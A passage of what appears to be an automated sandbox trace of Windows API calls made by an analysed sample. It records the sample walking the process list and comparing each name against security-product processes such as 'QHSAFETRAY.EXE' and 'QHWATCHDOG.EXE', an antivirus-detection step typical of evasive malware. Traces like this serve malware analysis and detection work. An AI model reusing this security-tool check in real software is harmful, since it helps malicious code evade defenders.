lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.013] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.013] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.014] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.014] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.014] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.014] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.014] lstrlenW (lpString="isolation.exe") returned 13 [0163.015] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.015] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.015] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.017] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.017] lstrlenW (lpString="abc.exe") returned 7 [0163.017] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.017] lstrcmpW (lpString1="ABC.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.017] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.017] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.017] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.017] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.017] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.017] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.018] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.018] lstrlenW (lpString="english_performing.exe") returned 22 [0163.018] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.018] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.018] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.019] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.019] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.019] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.019] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.019] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.019] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.019] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.020] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.020] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.020] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.020] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.020] lstrlenW (lpString="volume.exe") returned 10 [0163.020] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.020] lstrcmpW (lpString1="VOLUME.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.020] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.022] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.022] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.022] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.022] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.022] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.024] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.024] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.024] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.024] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.024] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.025] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.025] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.025] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.025] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.025] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.026] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.026] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.026] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.026] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.026] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.027] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.027] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.027] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.027] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.027] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.027] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.027] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.027] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.028] lstrcmpW (lpString1="EXCEL.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.028] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.029] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.029] lstrlenW (lpString="svchost.exe") returned 11 [0163.029] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.029] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.029] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.030] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.030] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.030] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.030] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.030] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.030] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.030] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.030] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.030] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.030] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.031] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.031] lstrlenW (lpString="svchost.exe") returned 11 [0163.031] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.031] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.038] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.039] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.039] lstrlenW (lpString="svchost.exe") returned 11 [0163.039] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.039] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.039] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.039] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.039] lstrlenW (lpString="winpoint.exe") returned 12 [0163.039] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.039] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="QHSAFETRAY.EXE") returned 1 [0163.040] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.040] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.040] lstrlenW (lpString="cmd.exe") returned 7 [0163.040] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.040] lstrcmpW (lpString1="CMD.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.040] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.041] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.041] lstrlenW (lpString="conhost.exe") returned 11 [0163.041] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.041] lstrcmpW (lpString1="CONHOST.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.041] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.042] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.042] lstrlenW (lpString="PING.EXE") returned 8 [0163.042] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.042] lstrcmpW (lpString1="PING.EXE", lpString2="QHSAFETRAY.EXE") returned -1 [0163.042] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.042] CloseHandle (hObject=0xe0) returned 1 [0163.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.044] lstrcpyW (in: lpString1=0x18f8e4, lpString2="QHWATCHDOG.EXE" | out: lpString1="QHWATCHDOG.EXE") returned="QHWATCHDOG.EXE" [0163.044] lstrlenW (lpString="QHWATCHDOG.EXE") returned 14 [0163.044] CharUpperBuffW (in: lpsz="QHWATCHDOG.EXE", cchLength=0xe | out: lpsz="QHWATCHDOG.EXE") returned 0xe [0163.044] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.045] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.045] lstrlenW (lpString="[System Process]") returned 16 [0163.045] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.045] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="QHWATCHDOG.EXE") returned -1 [0163.045] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.046] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.046] lstrlenW (lpString="System") returned 6 [0163.046] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.046] lstrcmpW (lpString1="SYSTEM", lpString2="QHWATCHDOG.EXE") returned 1 [0163.046] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.046] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.046] lstrlenW (lpString="smss.exe") returned 8 [0163.046] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.047] lstrcmpW (lpString1="SMSS.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.047] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.047] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.047] lstrlenW (lpString="csrss.exe") returned 9 [0163.047] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.047] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.047] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.048] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.048] lstrlenW (lpString="wininit.exe") returned 11 [0163.048] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.048] lstrcmpW (lpString1="WININIT.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.048] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.049] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.049] lstrlenW (lpString="csrss.exe") returned 9 [0163.049] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.049] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.049] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.050] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.050] lstrlenW (lpString="winlogon.exe") returned 12 [0163.050] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.050] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.050] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.050] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.050] lstrlenW (lpString="services.exe") returned 12 [0163.050] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.050] lstrcmpW (lpString1="SERVICES.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.050] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.051] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.051] lstrlenW (lpString="lsass.exe") returned 9 [0163.051] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.051] lstrcmpW (lpString1="LSASS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.051] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.052] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.052] lstrlenW (lpString="lsm.exe") returned 7 [0163.052] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.052] lstrcmpW (lpString1="LSM.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.052] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.052] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.052] lstrlenW (lpString="svchost.exe") returned 11 [0163.053] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.053] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.053] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.053] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.053] lstrlenW (lpString="svchost.exe") returned 11 [0163.053] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.053] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.053] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.054] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.054] lstrlenW (lpString="svchost.exe") returned 11 [0163.054] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.054] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.054] 